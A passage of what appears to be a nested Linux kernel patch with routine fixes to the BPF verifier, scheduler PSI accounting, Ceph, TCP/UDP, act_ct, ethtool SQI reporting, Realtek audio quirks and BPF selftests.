+ 						off, i, size);
+ 					return -EACCES;
+@@ -3636,6 +3638,8 @@ static int check_stack_read_fixed_off(struct bpf_verifier_env *env,
+ 				continue;
+ 			if (type == STACK_ZERO)
+ 				continue;
++			if (type == STACK_INVALID && env->allow_uninit_stack)
++				continue;
+ 			verbose(env, "invalid read from stack off %d+%d size %d\n",
+ 				off, i, size);
+ 			return -EACCES;
+@@ -5426,7 +5430,8 @@ static int check_stack_range_initialized(
+ 		stype = &state->stack[spi].slot_type[slot % BPF_REG_SIZE];
+ 		if (*stype == STACK_MISC)
+ 			goto mark;
+-		if (*stype == STACK_ZERO) {
++		if ((*stype == STACK_ZERO) ||
++		    (*stype == STACK_INVALID && env->allow_uninit_stack)) {
+ 			if (clobber) {
+ 				/* helper can write anything into the stack */
+ 				*stype = STACK_MISC;
+@@ -11967,6 +11972,10 @@ static bool stacksafe(struct bpf_verifier_env *env, struct bpf_func_state *old,
+ 		if (old->stack[spi].slot_type[i % BPF_REG_SIZE] == STACK_INVALID)
+ 			continue;
+ 
++		if (env->allow_uninit_stack &&
++		    old->stack[spi].slot_type[i % BPF_REG_SIZE] == STACK_MISC)
++			continue;
++
+ 		/* explored stack has more populated slots than current stack
+ 		 * and these slots were used
+ 		 */
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index d71234729edb4..cac41c49bd2f5 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -701,7 +701,6 @@ static void update_rq_clock_task(struct rq *rq, s64 delta)
+ 
+ 	rq->prev_irq_time += irq_delta;
+ 	delta -= irq_delta;
+-	psi_account_irqtime(rq->curr, irq_delta);
+ #endif
+ #ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
+ 	if (static_key_false((&paravirt_steal_rq_enabled))) {
+@@ -5500,7 +5499,7 @@ void scheduler_tick(void)
+ {
+ 	int cpu = smp_processor_id();
+ 	struct rq *rq = cpu_rq(cpu);
+-	struct task_struct *curr = rq->curr;
++	struct task_struct *curr;
+ 	struct rq_flags rf;
+ 	unsigned long thermal_pressure;
+ 	u64 resched_latency;
+@@ -5512,6 +5511,9 @@ void scheduler_tick(void)
+ 
+ 	rq_lock(rq, &rf);
+ 
++	curr = rq->curr;
++	psi_account_irqtime(rq, curr, NULL);
++
+ 	update_rq_clock(rq);
+ 	thermal_pressure = arch_scale_thermal_pressure(cpu_of(rq));
+ 	update_thermal_load_avg(rq_clock_thermal(rq), rq, thermal_pressure);
+@@ -6550,6 +6552,7 @@ static void __sched notrace __schedule(unsigned int sched_mode)
+ 		++*switch_count;
+ 
+ 		migrate_disable_switch(rq, prev);
++		psi_account_irqtime(rq, prev, next);
+ 		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
+ 
+ 		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 0de8354d5ad0a..d0851610cf467 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -8479,12 +8479,8 @@ static int detach_tasks(struct lb_env *env)
+ 			break;
+ 
+ 		env->loop++;
+-		/*
+-		 * We've more or less seen every task there is, call it quits
+-		 * unless we haven't found any movable task yet.
+-		 */
+-		if (env->loop > env->loop_max &&
+-		    !(env->flags & LBF_ALL_PINNED))
++		/* We've more or less seen every task there is, call it quits */
++		if (env->loop > env->loop_max)
+ 			break;
+ 
+ 		/* take a breather every nr_migrate tasks */
+@@ -10623,9 +10619,7 @@ static int load_balance(int this_cpu, struct rq *this_rq,
+ 
+ 		if (env.flags & LBF_NEED_BREAK) {
+ 			env.flags &= ~LBF_NEED_BREAK;
+-			/* Stop if we tried all running tasks */
+-			if (env.loop < busiest->nr_running)
+-				goto more_balance;
++			goto more_balance;
+ 		}
+ 
+ 		/*
+diff --git a/kernel/sched/psi.c b/kernel/sched/psi.c
+index 80d8c10e93638..81dbced92df5f 100644
+--- a/kernel/sched/psi.c
++++ b/kernel/sched/psi.c
+@@ -785,6 +785,7 @@ static void psi_group_change(struct psi_group *group, int cpu,
+ 	enum psi_states s;
+ 	u32 state_mask;
+ 
++	lockdep_assert_rq_held(cpu_rq(cpu));
+ 	groupc = per_cpu_ptr(group->pcpu, cpu);
+ 
+ 	/*
+@@ -1003,19 +1004,29 @@ void psi_task_switch(struct task_struct *prev, struct task_struct *next,
+ }
+ 
+ #ifdef CONFIG_IRQ_TIME_ACCOUNTING
+-void psi_account_irqtime(struct task_struct *task, u32 delta)
++void psi_account_irqtime(struct rq *rq, struct task_struct *curr, struct task_struct *prev)
+ {
+-	int cpu = task_cpu(task);
++	int cpu = task_cpu(curr);
+ 	struct psi_group *group;
+ 	struct psi_group_cpu *groupc;
+-	u64 now;
++	u64 now, irq;
++	s64 delta;
+ 
+-	if (!task->pid)
++	if (!curr->pid)
++		return;
++
++	lockdep_assert_rq_held(rq);
++	group = task_psi_group(curr);
++	if (prev && task_psi_group(prev) == group)
+ 		return;
+ 
+ 	now = cpu_clock(cpu);
++	irq = irq_time_read(cpu);
++	delta = (s64)(irq - rq->psi_irq_time);
++	if (delta < 0)
++		return;
++	rq->psi_irq_time = irq;
+ 
+-	group = task_psi_group(task);
+ 	do {
+ 		if (!group->enabled)
+ 			continue;
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index b62d53d7c264f..81d9698f0a1eb 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -1084,6 +1084,7 @@ struct rq {
+ 
+ #ifdef CONFIG_IRQ_TIME_ACCOUNTING
+ 	u64			prev_irq_time;
++	u64			psi_irq_time;
+ #endif
+ #ifdef CONFIG_PARAVIRT
+ 	u64			prev_steal_time;
+diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
+index 84a188913cc9d..b49a96fad1d2f 100644
+--- a/kernel/sched/stats.h
++++ b/kernel/sched/stats.h
+@@ -110,8 +110,12 @@ __schedstats_from_se(struct sched_entity *se)
+ void psi_task_change(struct task_struct *task, int clear, int set);
+ void psi_task_switch(struct task_struct *prev, struct task_struct *next,
+ 		     bool sleep);
+-void psi_account_irqtime(struct task_struct *task, u32 delta);
+-
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++void psi_account_irqtime(struct rq *rq, struct task_struct *curr, struct task_struct *prev);
++#else
++static inline void psi_account_irqtime(struct rq *rq, struct task_struct *curr,
++				       struct task_struct *prev) {}
++#endif /*CONFIG_IRQ_TIME_ACCOUNTING */
+ /*
+  * PSI tracks state that persists across sleeps, such as iowaits and
+  * memory stalls. As a result, it has to distinguish between sleeps,
+@@ -206,7 +210,8 @@ static inline void psi_ttwu_dequeue(struct task_struct *p) {}
+ static inline void psi_sched_switch(struct task_struct *prev,
+ 				    struct task_struct *next,
+ 				    bool sleep) {}
+-static inline void psi_account_irqtime(struct task_struct *task, u32 delta) {}
++static inline void psi_account_irqtime(struct rq *rq, struct task_struct *curr,
++				       struct task_struct *prev) {}
+ #endif /* CONFIG_PSI */
+ 
+ #ifdef CONFIG_SCHED_INFO
+diff --git a/net/ceph/mon_client.c b/net/ceph/mon_client.c
+index db60217f911b3..2cf1254fd4522 100644
+--- a/net/ceph/mon_client.c
++++ b/net/ceph/mon_client.c
+@@ -1085,13 +1085,19 @@ static void delayed_work(struct work_struct *work)
+ 	struct ceph_mon_client *monc =
+ 		container_of(work, struct ceph_mon_client, delayed_work.work);
+ 
+-	dout("monc delayed_work\n");
+ 	mutex_lock(&monc->mutex);
++	dout("%s mon%d\n", __func__, monc->cur_mon);
++	if (monc->cur_mon < 0) {
++		goto out;
++	}
++
+ 	if (monc->hunting) {
+ 		dout("%s continuing hunt\n", __func__);
+ 		reopen_session(monc);
+ 	} else {
+ 		int is_auth = ceph_auth_is_authenticated(monc->auth);
++
++		dout("%s is_authed %d\n", __func__, is_auth);
+ 		if (ceph_con_keepalive_expired(&monc->con,
+ 					       CEPH_MONC_PING_TIMEOUT)) {
+ 			dout("monc keepalive timeout\n");
+@@ -1116,6 +1122,8 @@ static void delayed_work(struct work_struct *work)
+ 		}
+ 	}
+ 	__schedule_delayed(monc);
++
++out:
+ 	mutex_unlock(&monc->mutex);
+ }
+ 
+@@ -1232,13 +1240,15 @@ EXPORT_SYMBOL(ceph_monc_init);
+ void ceph_monc_stop(struct ceph_mon_client *monc)
+ {
+ 	dout("stop\n");
+-	cancel_delayed_work_sync(&monc->delayed_work);
+ 
+ 	mutex_lock(&monc->mutex);
+ 	__close_session(monc);
++	monc->hunting = false;
+ 	monc->cur_mon = -1;
+ 	mutex_unlock(&monc->mutex);
+ 
++	cancel_delayed_work_sync(&monc->delayed_work);
++
+ 	/*
+ 	 * flush msgr queue before we destroy ourselves to ensure that:
+ 	 *  - any work that references our embedded con is finished.
+diff --git a/net/core/bpf_sk_storage.c b/net/core/bpf_sk_storage.c
+index ad01b1bea52e4..0124536e8a9db 100644
+--- a/net/core/bpf_sk_storage.c
++++ b/net/core/bpf_sk_storage.c
+@@ -48,10 +48,8 @@ static int bpf_sk_storage_del(struct sock *sk, struct bpf_map *map)
+ /* Called by __sk_destruct() & bpf_sk_storage_clone() */
+ void bpf_sk_storage_free(struct sock *sk)
+ {
+-	struct bpf_local_storage_elem *selem;
+ 	struct bpf_local_storage *sk_storage;
+ 	bool free_sk_storage = false;
+-	struct hlist_node *n;
+ 
+ 	rcu_read_lock();
+ 	sk_storage = rcu_dereference(sk->sk_bpf_storage);
+@@ -60,24 +58,8 @@ void bpf_sk_storage_free(struct sock *sk)
+ 		return;
+ 	}
+ 
+-	/* Netiher the bpf_prog nor the bpf-map's syscall
+-	 * could be modifying the sk_storage->list now.
+-	 * Thus, no elem can be added-to or deleted-from the
+-	 * sk_storage->list by the bpf_prog or by the bpf-map's syscall.
+-	 *
+-	 * It is racing with bpf_local_storage_map_free() alone
+-	 * when unlinking elem from the sk_storage->list and
+-	 * the map's bucket->list.
+-	 */
+ 	raw_spin_lock_bh(&sk_storage->lock);
+-	hlist_for_each_entry_safe(selem, n, &sk_storage->list, snode) {
+-		/* Always unlink from map before unlinking from
+-		 * sk_storage.
+-		 */
+-		bpf_selem_unlink_map(selem);
+-		free_sk_storage = bpf_selem_unlink_storage_nolock(
+-			sk_storage, selem, true, false);
+-	}
++	free_sk_storage = bpf_local_storage_unlink_nolock(sk_storage);
+ 	raw_spin_unlock_bh(&sk_storage->lock);
+ 	rcu_read_unlock();
+ 
+@@ -87,23 +69,12 @@ void bpf_sk_storage_free(struct sock *sk)
+ 
+ static void bpf_sk_storage_map_free(struct bpf_map *map)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = (struct bpf_local_storage_map *)map;
+-	bpf_local_storage_cache_idx_free(&sk_cache, smap->cache_idx);
+-	bpf_local_storage_map_free(smap, NULL);
++	bpf_local_storage_map_free(map, &sk_cache, NULL);
+ }
+ 
+ static struct bpf_map *bpf_sk_storage_map_alloc(union bpf_attr *attr)
+ {
+-	struct bpf_local_storage_map *smap;
+-
+-	smap = bpf_local_storage_map_alloc(attr);
+-	if (IS_ERR(smap))
+-		return ERR_CAST(smap);
+-
+-	smap->cache_idx = bpf_local_storage_cache_idx_get(&sk_cache);
+-	return &smap->map;
++	return bpf_local_storage_map_alloc(attr, &sk_cache);
+ }
+ 
+ static int notsupp_get_next_key(struct bpf_map *map, void *key,
+diff --git a/net/core/datagram.c b/net/core/datagram.c
+index cdd65ca3124a4..87c39cc12327f 100644
+--- a/net/core/datagram.c
++++ b/net/core/datagram.c
+@@ -441,11 +441,12 @@ static int __skb_datagram_iter(const struct sk_buff *skb, int offset,
+ 			if (copy > len)
+ 				copy = len;
+ 
++			n = 0;
+ 			skb_frag_foreach_page(frag,
+ 					      skb_frag_off(frag) + offset - start,
+ 					      copy, p, p_off, p_len, copied) {
+ 				vaddr = kmap_local_page(p);
+-				n = INDIRECT_CALL_1(cb, simple_copy_to_iter,
++				n += INDIRECT_CALL_1(cb, simple_copy_to_iter,
+ 					vaddr + p_off, p_len, data, to);
+ 				kunmap_local(vaddr);
+ 			}
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 8b0459a6b629f..746d950de0e14 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -433,7 +433,8 @@ int sk_msg_recvmsg(struct sock *sk, struct sk_psock *psock, struct msghdr *msg,
+ 			page = sg_page(sge);
+ 			if (copied + copy > len)
+ 				copy = len - copied;
+-			copy = copy_page_to_iter(page, sge->offset, copy, iter);
++			if (copy)
++				copy = copy_page_to_iter(page, sge->offset, copy, iter);
+ 			if (!copy) {
+ 				copied = copied ? copied : -EFAULT;
+ 				goto out;
+diff --git a/net/ethtool/linkstate.c b/net/ethtool/linkstate.c
+index fb676f349455a..470582a70ccbe 100644
+--- a/net/ethtool/linkstate.c
++++ b/net/ethtool/linkstate.c
+@@ -36,6 +36,8 @@ static int linkstate_get_sqi(struct net_device *dev)
+ 	mutex_lock(&phydev->lock);
+ 	if (!phydev->drv || !phydev->drv->get_sqi)
+ 		ret = -EOPNOTSUPP;
++	else if (!phydev->link)
++		ret = -ENETDOWN;
+ 	else
+ 		ret = phydev->drv->get_sqi(phydev);
+ 	mutex_unlock(&phydev->lock);
+@@ -54,6 +56,8 @@ static int linkstate_get_sqi_max(struct net_device *dev)
+ 	mutex_lock(&phydev->lock);
+ 	if (!phydev->drv || !phydev->drv->get_sqi_max)
+ 		ret = -EOPNOTSUPP;
++	else if (!phydev->link)
++		ret = -ENETDOWN;
+ 	else
+ 		ret = phydev->drv->get_sqi_max(phydev);
+ 	mutex_unlock(&phydev->lock);
+@@ -61,6 +65,17 @@ static int linkstate_get_sqi_max(struct net_device *dev)
+ 	return ret;
+ };
+ 
++static bool linkstate_sqi_critical_error(int sqi)
++{
++	return sqi < 0 && sqi != -EOPNOTSUPP && sqi != -ENETDOWN;
++}
++
++static bool linkstate_sqi_valid(struct linkstate_reply_data *data)
++{
++	return data->sqi >= 0 && data->sqi_max >= 0 &&
++	       data->sqi <= data->sqi_max;
++}
++
+ static int linkstate_get_link_ext_state(struct net_device *dev,
+ 					struct linkstate_reply_data *data)
+ {
+@@ -92,12 +107,12 @@ static int linkstate_prepare_data(const struct ethnl_req_info *req_base,
+ 	data->link = __ethtool_get_link(dev);
+ 
+ 	ret = linkstate_get_sqi(dev);
+-	if (ret < 0 && ret != -EOPNOTSUPP)
++	if (linkstate_sqi_critical_error(ret))
+ 		goto out;
+ 	data->sqi = ret;
+ 
+ 	ret = linkstate_get_sqi_max(dev);
+-	if (ret < 0 && ret != -EOPNOTSUPP)
++	if (linkstate_sqi_critical_error(ret))
+ 		goto out;
+ 	data->sqi_max = ret;
+ 
+@@ -122,11 +137,10 @@ static int linkstate_reply_size(const struct ethnl_req_info *req_base,
+ 	len = nla_total_size(sizeof(u8)) /* LINKSTATE_LINK */
+ 		+ 0;
+ 
+-	if (data->sqi != -EOPNOTSUPP)
+-		len += nla_total_size(sizeof(u32));
+-
+-	if (data->sqi_max != -EOPNOTSUPP)
+-		len += nla_total_size(sizeof(u32));
++	if (linkstate_sqi_valid(data)) {
++		len += nla_total_size(sizeof(u32)); /* LINKSTATE_SQI */
++		len += nla_total_size(sizeof(u32)); /* LINKSTATE_SQI_MAX */
++	}
+ 
+ 	if (data->link_ext_state_provided)
+ 		len += nla_total_size(sizeof(u8)); /* LINKSTATE_EXT_STATE */
+@@ -147,13 +161,14 @@ static int linkstate_fill_reply(struct sk_buff *skb,
+ 	    nla_put_u8(skb, ETHTOOL_A_LINKSTATE_LINK, !!data->link))
+ 		return -EMSGSIZE;
+ 
+-	if (data->sqi != -EOPNOTSUPP &&
+-	    nla_put_u32(skb, ETHTOOL_A_LINKSTATE_SQI, data->sqi))
+-		return -EMSGSIZE;
++	if (linkstate_sqi_valid(data)) {
++		if (nla_put_u32(skb, ETHTOOL_A_LINKSTATE_SQI, data->sqi))
++			return -EMSGSIZE;
+ 
+-	if (data->sqi_max != -EOPNOTSUPP &&
+-	    nla_put_u32(skb, ETHTOOL_A_LINKSTATE_SQI_MAX, data->sqi_max))
+-		return -EMSGSIZE;
++		if (nla_put_u32(skb, ETHTOOL_A_LINKSTATE_SQI_MAX,
++				data->sqi_max))
++			return -EMSGSIZE;
++	}
+ 
+ 	if (data->link_ext_state_provided) {
+ 		if (nla_put_u8(skb, ETHTOOL_A_LINKSTATE_EXT_STATE,
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 317cb90d77102..359ffda9b736b 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -2101,8 +2101,16 @@ void tcp_clear_retrans(struct tcp_sock *tp)
+ static inline void tcp_init_undo(struct tcp_sock *tp)
+ {
+ 	tp->undo_marker = tp->snd_una;
++
+ 	/* Retransmission still in flight may cause DSACKs later. */
+-	tp->undo_retrans = tp->retrans_out ? : -1;
++	/* First, account for regular retransmits in flight: */
++	tp->undo_retrans = tp->retrans_out;
++	/* Next, account for TLP retransmits in flight: */
++	if (tp->tlp_high_seq && tp->tlp_retrans)
++		tp->undo_retrans++;
++	/* Finally, avoid 0, because undo_retrans==0 means "can undo now": */
++	if (!tp->undo_retrans)
++		tp->undo_retrans = -1;
+ }
+ 
+ static bool tcp_is_rack(const struct sock *sk)
+@@ -2181,6 +2189,7 @@ void tcp_enter_loss(struct sock *sk)
+ 
+ 	tcp_set_ca_state(sk, TCP_CA_Loss);
+ 	tp->high_seq = tp->snd_nxt;
++	tp->tlp_high_seq = 0;
+ 	tcp_ecn_queue_cwr(tp);
+ 
+ 	/* F-RTO RFC5682 sec 3.1 step 1: retransmit SND.UNA if no previous
+diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
+index 44b49f7d1a9e6..016f9eff49b40 100644
+--- a/net/ipv4/tcp_timer.c
++++ b/net/ipv4/tcp_timer.c
+@@ -444,17 +444,34 @@ static void tcp_fastopen_synack_timer(struct sock *sk, struct request_sock *req)
+ static bool tcp_rtx_probe0_timed_out(const struct sock *sk,
+ 				     const struct sk_buff *skb)
+ {
++	const struct inet_connection_sock *icsk = inet_csk(sk);
++	u32 user_timeout = READ_ONCE(icsk->icsk_user_timeout);
+ 	const struct tcp_sock *tp = tcp_sk(sk);
+-	const int timeout = TCP_RTO_MAX * 2;
+-	u32 rcv_delta, rtx_delta;
+-
+-	rcv_delta = inet_csk(sk)->icsk_timeout - tp->rcv_tstamp;
+-	if (rcv_delta <= timeout)
+-		return false;
++	int timeout = TCP_RTO_MAX * 2;
++	u32 rtx_delta;
++	s32 rcv_delta;
+ 
+ 	rtx_delta = (u32)msecs_to_jiffies(tcp_time_stamp(tp) -
+ 			(tp->retrans_stamp ?: tcp_skb_timestamp(skb)));
+ 
++	if (user_timeout) {
++		/* If user application specified a TCP_USER_TIMEOUT,
++		 * it does not want win 0 packets to 'reset the timer'
++		 * while retransmits are not making progress.
++		 */
++		if (rtx_delta > user_timeout)
++			return true;
++		timeout = min_t(u32, timeout, msecs_to_jiffies(user_timeout));
++	}
++
++	/* Note: timer interrupt might have been delayed by at least one jiffy,
++	 * and tp->rcv_tstamp might very well have been written recently.
++	 * rcv_delta can thus be negative.
++	 */
++	rcv_delta = icsk->icsk_timeout - tp->rcv_tstamp;
++	if (rcv_delta <= timeout)
++		return false;
++
+ 	return rtx_delta > timeout;
+ }
+ 
+@@ -496,8 +513,6 @@ void tcp_retransmit_timer(struct sock *sk)
+ 	if (WARN_ON_ONCE(!skb))
+ 		return;
+ 
+-	tp->tlp_high_seq = 0;
+-
+ 	if (!tp->snd_wnd && !sock_flag(sk, SOCK_DEAD) &&
+ 	    !((1 << sk->sk_state) & (TCPF_SYN_SENT | TCPF_SYN_RECV))) {
+ 		/* Receiver dastardly shrinks window. Our retransmits
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index b8f93c1479ae1..53267566808c1 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -319,6 +319,8 @@ int udp_lib_get_port(struct sock *sk, unsigned short snum,
+ 			goto fail_unlock;
+ 		}
+ 
++		sock_set_flag(sk, SOCK_RCU_FREE);
++
+ 		sk_add_node_rcu(sk, &hslot->head);
+ 		hslot->count++;
+ 		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
+@@ -335,7 +337,7 @@ int udp_lib_get_port(struct sock *sk, unsigned short snum,
+ 		hslot2->count++;
+ 		spin_unlock(&hslot2->lock);
+ 	}
+-	sock_set_flag(sk, SOCK_RCU_FREE);
++
+ 	error = 0;
+ fail_unlock:
+ 	spin_unlock_bh(&hslot->lock);
+diff --git a/net/sched/act_ct.c b/net/sched/act_ct.c
+index cd95a315fde82..44ff7f356ec15 100644
+--- a/net/sched/act_ct.c
++++ b/net/sched/act_ct.c
+@@ -1212,6 +1212,14 @@ static int tcf_ct_act(struct sk_buff *skb, const struct tc_action *a,
+ 		 */
+ 		if (nf_conntrack_confirm(skb) != NF_ACCEPT)
+ 			goto drop;
++
++		/* The ct may be dropped if a clash has been resolved,
++		 * so it's necessary to retrieve it from skb again to
++		 * prevent UAF.
++		 */
++		ct = nf_ct_get(skb, &ctinfo);
++		if (!ct)
++			skip_add = true;
+ 	}
+ 
+ 	if (!skip_add)
+diff --git a/net/sunrpc/xprtsock.c b/net/sunrpc/xprtsock.c
+index 05aa32696e7c2..02f651f85e739 100644
+--- a/net/sunrpc/xprtsock.c
++++ b/net/sunrpc/xprtsock.c
+@@ -2333,6 +2333,13 @@ static void xs_tcp_setup_socket(struct work_struct *work)
+ 		transport->srcport = 0;
+ 		status = -EAGAIN;
+ 		break;
++	case -EPERM:
++		/* Happens, for instance, if a BPF program is preventing
++		 * the connect. Remap the error so upper layers can better
++		 * deal with it.
++		 */
++		status = -ECONNREFUSED;
++		fallthrough;
+ 	case -EINVAL:
+ 		/* Happens, for instance, if the user specified a link
+ 		 * local IPv6 address without a scope-id.
+diff --git a/scripts/ld-version.sh b/scripts/ld-version.sh
+index a78b804b680cf..b9513d224476f 100755
+--- a/scripts/ld-version.sh
++++ b/scripts/ld-version.sh
+@@ -57,9 +57,11 @@ else
+ 	fi
+ fi
+ 
+-# Some distributions append a package release number, as in 2.34-4.fc32
+-# Trim the hyphen and any characters that follow.
+-version=${version%-*}
++# There may be something after the version, such as a distribution's package
++# release number (like Fedora's "2.34-4.fc32") or punctuation (like LLD briefly
++# added before the "compatible with GNU linkers" string), so remove everything
++# after just numbers and periods.
++version=${version%%[!0-9.]*}
+ 
+ cversion=$(get_canonical_version $version)
+ min_cversion=$(get_canonical_version $min_version)
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 4635dc70a8404..06f00819d1a8a 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9661,6 +9661,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x83b9, "HP Spectre x360", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x841c, "HP Pavilion 15-CK0xx", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x8497, "HP Envy x360", ALC269_FIXUP_HP_MUTE_LED_MIC3),
++	SND_PCI_QUIRK(0x103c, 0x84a6, "HP 250 G7 Notebook PC", ALC269_FIXUP_HP_LINE1_MIC1_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x84ae, "HP 15-db0403ng", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x84da, "HP OMEN dc0019-ur", ALC295_FIXUP_HP_OMEN),
+ 	SND_PCI_QUIRK(0x103c, 0x84e7, "HP Pavilion 15", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+@@ -9922,6 +9923,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x10cf, 0x1845, "Lifebook U904", ALC269_FIXUP_LIFEBOOK_EXTMIC),
+ 	SND_PCI_QUIRK(0x10ec, 0x10f2, "Intel Reference board", ALC700_FIXUP_INTEL_REFERENCE),
+ 	SND_PCI_QUIRK(0x10ec, 0x118c, "Medion EE4254 MD62100", ALC256_FIXUP_MEDION_HEADSET_NO_PRESENCE),
++	SND_PCI_QUIRK(0x10ec, 0x11bc, "VAIO VJFE-IL", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x10ec, 0x1230, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x124c, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1252, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+@@ -10015,6 +10017,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0xa600, "Clevo NL50NU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa650, "Clevo NP[567]0SN[CD]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa671, "Clevo NP70SN[CDE]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0xa763, "Clevo V54x_6x_TU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb018, "Clevo NP50D[BE]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb019, "Clevo NH77D[BE]Q", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb022, "Clevo NH77D[DC][QW]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -10153,6 +10156,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1d72, 0x1901, "RedmiBook 14", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1945, "Redmi G", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1947, "RedmiBook Air", ALC255_FIXUP_XIAOMI_HEADSET_MIC),
++	SND_PCI_QUIRK(0x2782, 0x0214, "VAIO VJFE-CL", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x2782, 0x0232, "CHUWI CoreBook XPro", ALC269VB_FIXUP_CHUWI_COREBOOK_XPRO),
+ 	SND_PCI_QUIRK(0x2782, 0x1707, "Vaio VJFE-ADL", ALC298_FIXUP_SPK_VOLUME),
+ 	SND_PCI_QUIRK(0x8086, 0x2074, "Intel NUC 8", ALC233_FIXUP_INTEL_NUC8_DMIC),
+diff --git a/tools/testing/selftests/bpf/progs/test_global_func10.c b/tools/testing/selftests/bpf/progs/test_global_func10.c
+index 97b7031d0e227..d361eba167f6a 100644
+--- a/tools/testing/selftests/bpf/progs/test_global_func10.c
++++ b/tools/testing/selftests/bpf/progs/test_global_func10.c
+@@ -4,12 +4,12 @@
+ #include <bpf/bpf_helpers.h>
+ 
+ struct Small {
+-	int x;
++	long x;
+ };
+ 
+ struct Big {
+-	int x;
+-	int y;
++	long x;
++	long y;
+ };
+ 
+ __noinline int foo(const struct Big *big)
+@@ -21,7 +21,8 @@ __noinline int foo(const struct Big *big)
+ }
+ 
+ SEC("cgroup_skb/ingress")
+-int test_cls(struct __sk_buff *skb)
++__failure __msg("invalid indirect access to stack")
++int global_func10(struct __sk_buff *skb)
+ {
+ 	const struct Small small = {.x = skb->len };
+ 
+diff --git a/tools/testing/selftests/bpf/verifier/calls.c b/tools/testing/selftests/bpf/verifier/calls.c
+index e1a937277b54d..a201d2871bfbd 100644
+--- a/tools/testing/selftests/bpf/verifier/calls.c
++++ b/tools/testing/selftests/bpf/verifier/calls.c
+@@ -2221,19 +2221,22 @@
+ 	 * that fp-8 stack slot was unused in the fall-through
+ 	 * branch and will accept the program incorrectly
+ 	 */
+-	BPF_JMP_IMM(BPF_JGT, BPF_REG_1, 2, 2),
++	BPF_EMIT_CALL(BPF_FUNC_get_prandom_u32),
++	BPF_JMP_IMM(BPF_JGT, BPF_REG_0, 2, 2),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_JMP_IMM(BPF_JA, 0, 0, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
++	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_48b = { 6 },
+-	.errstr = "invalid indirect read from stack R2 off -8+0 size 8",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_XDP,
++	.fixup_map_hash_48b = { 7 },
++	.errstr_unpriv = "invalid indirect read from stack R2 off -8+0 size 8",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"calls: ctx read at start of subprog",
+diff --git a/tools/testing/selftests/bpf/verifier/helper_access_var_len.c b/tools/testing/selftests/bpf/verifier/helper_access_var_len.c
